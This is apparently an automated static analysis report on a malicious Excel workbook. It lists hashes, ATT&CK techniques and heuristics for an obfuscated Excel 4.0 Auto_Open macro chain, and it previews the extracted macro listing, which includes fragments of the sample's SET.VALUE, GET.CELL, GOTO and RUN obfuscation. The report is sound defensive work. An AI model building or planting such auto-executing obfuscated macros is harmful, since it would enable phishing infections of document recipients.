Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4cb73cb960d18d87…

MALICIOUS

Office (OLE)

237.5 KB Created: 2020-05-21 08:09:50 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: a5d00dfda986cb3f53b9cd952dc829c9 SHA-1: b58be5a997c6de3bc9f28b2a79bbb353963a1141 SHA-256: 4cb73cb960d18d87e3144ded9e4917e3922d999d6a3c5bb46762d8c06a3f3493
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macros are designed to run automatically upon opening the document, suggesting a malicious intent to execute arbitrary code. The presence of an Auto_Open entry points to a spearphishing attachment delivery method.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 127981 bytes
SHA-256: 880797d6df024252f777313e8526617b4325832a90d32f335eb1b83d4370e7e4
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!C46084 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,GE37,"",0.06799704360679970083
'  Sheet,BL97,"",522.00000000000000000000
'  Sheet,JT100,"",281.00000000000000000000
'  Sheet,HY106,"",-780.80062499999996816769
'  Sheet,FO127,"",-0.07006369426751592189
'  Sheet,GN142,"",-1.58608695652173925517
'  Sheet,ER152,"",-7.75000000000000000000
'  Sheet,ED196,"",-0.26515151515151513806
'  Sheet,JN196,"",478.00000000000000000000
'  Sheet,IP231,"",1.91304347826086962314
'  Sheet,CP268,"SET.VALUE(DR35951,GET.CELL(38,FI25159)*-472.00000000000000000000/10)",""
'  Sheet,CP269,GOTO(IG45162),""
'  Sheet,IU283,"",-489.00000000000000000000
'  Sheet,CB304,"SET.VALUE(IM32368,451/2*GET.CELL(19,HU2865))",""
'  Sheet,CB305,RUN(CP268),""
'  Sheet,DP323,"",-0.35294117647058825815
'  Sheet,FW387,"",269.39999999999997726263
'  Sheet,DZ389,"",3.98387096774193549820
'  Sheet,HN410,"",-5.36538461538461497469
'  Sheet,EN458,"",10.31153846153846309619
'  Sheet,GG534,"",3.89411764705882346149
'  Sheet,CH543,"",-0.07484076433121018834
'  Sheet,EJ565,"",1.76706827309236946810
'  Sheet,HA666,"",-496.20000000000004547474
'  Sheet,CY693,"",532.00000000000000000000
'  Sheet,DH753,"",111.00000000000000000000
'  Sheet,HH767,"",-0.66906574820143882576
'  Sheet,BG784,"",-1.26415094339622635644
'  Sheet,IO823,"",52.87500000000000000000
'  Sheet,DK864,"",-4.25806451612903202886
'  Sheet,DC882,"",-1.75949367088607599996
'  Sheet,DC904,"",-88.00000000000000000000
'  Sheet,HN915,"",1.91304347826086962314
'  Sheet,J952,"",0.16407982261640799426
'  Sheet,D985,"",0.14360313315926892530
'  Sheet,JJ1015,"",55.00000000000000000000
'  Sheet,HI1016,"",0.08205893323386795335
'  Sheet,JA1024,"",487.00000000000000000000
'  Sheet,U1065,"",79.87500000000000000000
'  Sheet,FZ1148,"",-13.76666666666666571928
'  Sheet,JM1163,"",216.40015625000000909495
'  Sheet,DP1164,"",3.34136546184738936205
'  Sheet,GW1181,"",-1.89189189189189188589
'  Sheet,JJ1182,"",-2.07462686567164178442
'  Sheet,DW1221,"",-11.59298245614034961193
'  Sheet,JF1228,"",-13.65217391304347849257
'  Sheet,HV1278,"",-5.25000000000000000000
'  Sheet,BO1351,"",-132.00000000000000000000
'  Sheet,CD1378,"",-38.12500000000000000000
'  Sheet,FL1428,"",91.12500000000000000000
'  Sheet,GX1441,"",-0.35971223021582732216
'  Sheet,DO1488,"",-286.00000000000000000000
'  Sheet,CL1502,"",-6.75268817204301097235
'  Sheet,CK1521,"",-266.39999999999997726263
'  Sheet,BF1571,"",-88.12500000000000000000
'  Sheet,DW1593,"",264.39999999999997726263
'  Sheet,DM1594,"",73.87500000000000000000
'  Sheet,EB1637,"",-85.00000000000000000000
'  Sheet,IG1646,"",-630.50000000000000000000
'  Sheet,BO1712,"",107.00000000000000000000
'  Sheet,EC1752,"",-0.19672131147540983243
'  Sheet,CH1757,"",-105.12500000000000000000
'  Sheet,CV1761,"",463.00000000000000000000
'  Sheet,FV1805,"",486.20000000000004547474
'  Sheet,GA1807,"",-0.07710843373493976582
'  Sheet,BT1831,"",-372.00000000000000000000
'  Sheet,FU1882,"",173.00000000000000000000
'  Sheet,JR1920,"SET.VALUE(GC9538,GET.CELL(24,HX51270)-281)",""
'  Sheet,JR1921,RUN(JJ3840),""
'  Sheet,A1987,"",-6.97014925373134364150
'  Sheet,HX1998,"",378.00000000000000000000
'  Sheet,CY2027,"",-281.39999999999997726263
'  Sheet,II2045,"",0.16851441241685144456
'  Sheet,IJ2061,"",0.28712871287128710618
'  Sheet,DU2065,"",-0.39047619047619047672
'  Sheet,JT2093,"",-3.96521739130434802689
'  Sheet,CV2120,"",-710.00000000000000000000
'  Sheet,DI2133,"",0.34501347708894880562
'  Sheet,FX2208,"",0.55580357142857139685
'  Sheet,EF2214,"",1.76107594936708866662
'  Sheet,JA2349,"",123.00000000000000000000
'  Sheet,DK2352,"",158.00000000000000000000
'  Sheet,IU2386,"",-70.0000000000000
... (truncated)